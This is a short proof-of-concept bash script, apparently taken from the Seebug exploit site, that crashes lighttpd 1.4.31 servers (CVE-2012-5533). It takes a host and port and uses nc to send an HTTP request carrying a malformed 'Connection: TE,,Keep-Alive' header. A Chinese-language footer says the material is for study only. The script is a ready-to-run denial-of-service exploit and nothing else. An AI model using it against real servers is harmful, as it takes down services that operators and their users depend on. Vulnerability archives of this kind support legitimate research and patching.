#!/bin/bash # Exploit Title: simple lighttpd 1.4.31 DOS POC # Date: 11/21/2012 # Exploit Author: t4c@ghcif.de # Vendor Homepage: http://www.lighttpd.net # Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz # Version: 1.4.31 # Tested on: Debian Linux, Gentoo Linux, Arch Linux # CVE: CVE-2012-5533 if [ $# -lt 2 ] then echo "usage :$0 <Host/IP> <Port>" else echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2 fi
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论